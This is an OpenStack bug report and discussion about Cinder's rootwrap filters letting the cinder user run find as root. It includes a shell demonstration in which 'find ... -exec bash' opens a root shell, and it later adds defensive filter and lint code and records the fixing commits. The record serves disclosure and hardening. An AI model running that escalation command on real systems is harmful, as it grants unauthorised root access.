Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Bug #1250101 reported by Darragh O'Reilly on 2013-11-11
Affects | Importance | Assigned to
Cinder | Undecided | Daniel Gollub
OpenStack Security Advisory | Undecided | Unassigned
oslo-incubator | Undecided | Unassigned

Bug Description

The patch https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d added the find command to etc/cinder/rootwrap.d/volume.filters. This introduces a security hole as the find command is able to call exec, and so the cinder user can run any command as root. For example:

vagrant@controller:~$ sudo -u cinder bash
cinder@controller:~$ id
uid=109(cinder) gid=115(cinder) groups=115(cinder)

cinder@controller:~$ sudo /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

root@controller:~# id
uid=0(root) gid=0(root) groups=0(root)

I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.
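
The kind of argument check proposed above, written as an allowlist of find primaries instead of a list of rejected flags, so that -exec, -execdir and anything else unlisted is refused. This is an added example, not Cinder's or Oslo's code; the function name, the permitted primaries and the /var/lib/cinder/mnt base are assumptions.

```python
import posixpath

# Constructed policy for this example: primaries the filter permits and how
# many values each one consumes. Anything not listed here is refused.
ALLOWED_PRIMARIES = {"-maxdepth": 1, "-mindepth": 1, "-name": 1,
                     "-type": 1, "-inum": 1, "-print": 0}
ALLOWED_ROOTS = ("/var/lib/cinder/mnt",)  # assumed mount base, not from the page


def find_args_allowed(userargs):
    """Return True only for 'find <path under an allowed root> [primaries]'."""
    if len(userargs) < 2 or userargs[0] != "find":
        return False
    path = userargs[1]
    if not path.startswith("/"):
        return False  # relative paths and option-like first arguments
    # Normalise before comparing so '..' cannot walk out of an allowed root.
    norm = posixpath.normpath(path)
    if not any(norm == r or norm.startswith(r + "/") for r in ALLOWED_ROOTS):
        return False
    i = 2
    while i < len(userargs):
        arity = ALLOWED_PRIMARIES.get(userargs[i])
        if arity is None:
            return False  # -exec, -execdir and every other unlisted primary
        values = userargs[i + 1:i + 1 + arity]
        if len(values) != arity or any(v.startswith("-") for v in values):
            return False  # missing value, or a primary smuggled in as a value
        i += 1 + arity
    return True
```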

Jeremy Stanley (fungi) wrote :

John/Doug, thoughts on how and where we want to mitigate this initially? Patch rootwrap in Cinder first, then replicate that change to Oslo once the security advisory is published?

Thierry Carrez (ttx) wrote :

The issue does not live in Oslo. It lives in the filters that are shipped with Cinder. So that would only need to be fixed in Cinder.

That said, I'm not sure that would be security advisory material. The cinder user already has (limited) escalation to root, the rootwrap is just trying hard to limit the extent of it. Find is clearly not the only command that can be easily abused in Cinder volume.filters: this one also allows dd, chown, ln, chmod and mv... which can all be abused to fully escalate the cinder user to the root user on Cinder.

Like nova compute nodes, cinder volume nodes run, in effect, as root. Rootwrap is a tool that can be used to limit root escalation, but on those nodes there is still a lot of work to do before they can be considered truly isolated. Those efforts would fall into strengthening, rather than vulnerability fixing, since those weaknesses cannot be directly exploited (attacker needs to be able to execute code as the cinder user first).

This is very much like https://bugs.launchpad.net/nova/+bug/1081795 -- and the comment I made there also applies to this bug:

"""
So I would count this as a welcome strengthening step, but not issue an advisory about it (which could be interpreted as "we vouch that this user can't be escalated to root anymore") [...]

I'm also for making this bug public, unless one of you object.
"""

Changed in oslo:
status: New → Invalid
Changed in ossa:
status: New → Incomplete
summary: - rootwrap find allows arbitrary commands
+ Cinder's rootwrap filters allow to run find as root, which allows
+ arbitrary commands

That's ok with me.

Doug Hellmann (doug-hellmann) wrote :

Thierry's assessment seems correct to me.

John Griffith (john-griffith) wrote :

I'm in agreement with Thierry's assessment as well.

Jeremy Stanley (fungi) wrote :

I too agree, so switched it to public with no associated advisory.

Changed in ossa:
status: Incomplete → Invalid
information type: Private Security → Public
tags: added: security
Daniel Gollub (d-gollub) on 2014-02-22
Changed in cinder:
assignee: nobody → Daniel Gollub (d-gollub)
status: New → Confirmed

Fix proposed to branch: master
Review: https://review.openstack.org/75629

Changed in cinder:
status: Confirmed → In Progress

Reviewed: https://review.openstack.org/75629
Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=6af10e84e1a3f1e4673bc2f58142269a2bfeefcf
Submitter: Jenkins
Branch: master

commit 6af10e84e1a3f1e4673bc2f58142269a2bfeefcf
Author: Daniel Gollub <email address hidden>
Date: Wed Feb 19 07:37:20 2014 +0100

    Restrict rootwrap find filter for NetAppNFS driver

    Additionally, make the name of the filter unique, so it does not override
    any other rule, like the find rule of the GPFS driver.
    Rootwrap makes use of plain Python ConfigParser, which handles INI files
    in a key=value pair fashion, where the key is unique.

    Closes-Bug: 1250101

    Change-Id: Id2f193485089e12f00008b38fad2b95a09674ff2

Changed in cinder:
status: In Progress → Fix Committed

Reviewed: https://review.openstack.org/76529
Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=2c44cfa2db0cd1a5ba6c02581b34136d7ee5d4fb
Submitter: Jenkins
Branch: master

commit 2c44cfa2db0cd1a5ba6c02581b34136d7ee5d4fb
Author: Daniel Gollub <email address hidden>
Date: Wed Feb 19 07:41:24 2014 +0100

    Restrict rootwrap find filter for IBM NAS and GPFS

    Additionally, make the name of the filter unique, so it does not override
    any other rule, like the find rule of the NetAppNFS driver.
    Rootwrap makes use of plain Python ConfigParser, which handles INI files
    in a key=value pair fashion, where the key is unique.

    Related-Bug: 1250101

    Change-Id: I56a96084dc736e73e3e9533803f65956699891a0
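
The key-uniqueness point in both commit messages, shown on a constructed filters file: two rules named `find` in one `[Filters]` section collapse to whichever comes last, and a small lint flags the collision. This is an added example, not the project's code; the file contents and function names are assumptions, and `strict=False` is used to reproduce the last-one-wins behaviour in Python 3.

```python
import configparser
import re
from collections import Counter

# Constructed filters file: two drivers each define a filter named "find".
VOLUME_FILTERS = """\
[Filters]
# driver A: restricted rule (constructed)
find: RegExpFilter, find, root, find, /mnt/a, -maxdepth, \\d+
# driver B: unrestricted rule later in the same file (constructed)
find: CommandFilter, find, root
"""


def effective_filters(text):
    """Return the name -> definition mapping a last-one-wins parser yields."""
    # strict=False gives the silent override; Python 3's default
    # (strict=True) raises DuplicateOptionError on the second "find".
    parser = configparser.RawConfigParser(strict=False)
    parser.read_string(text)
    return dict(parser.items("Filters"))


def duplicate_filter_names(text):
    """Lint: option names defined more than once in one filters file."""
    # Simplification: not section-aware, which is enough for a file that
    # only carries a [Filters] section.
    names = Counter()
    for line in text.splitlines():
        m = re.match(r"^([^\s#;\[][^:=]*?)\s*[:=]", line)
        if m:
            names[m.group(1).lower()] += 1
    return sorted(n for n, count in names.items() if count > 1)
```

Running `duplicate_filter_names` over each file in the rootwrap filters directory before deployment catches a rule that would otherwise be silently replaced.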

Thierry Carrez (ttx) on 2014-03-05
Changed in cinder:
milestone: none → icehouse-3
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2014-04-17
Changed in cinder:
milestone: icehouse-3 → 2014.1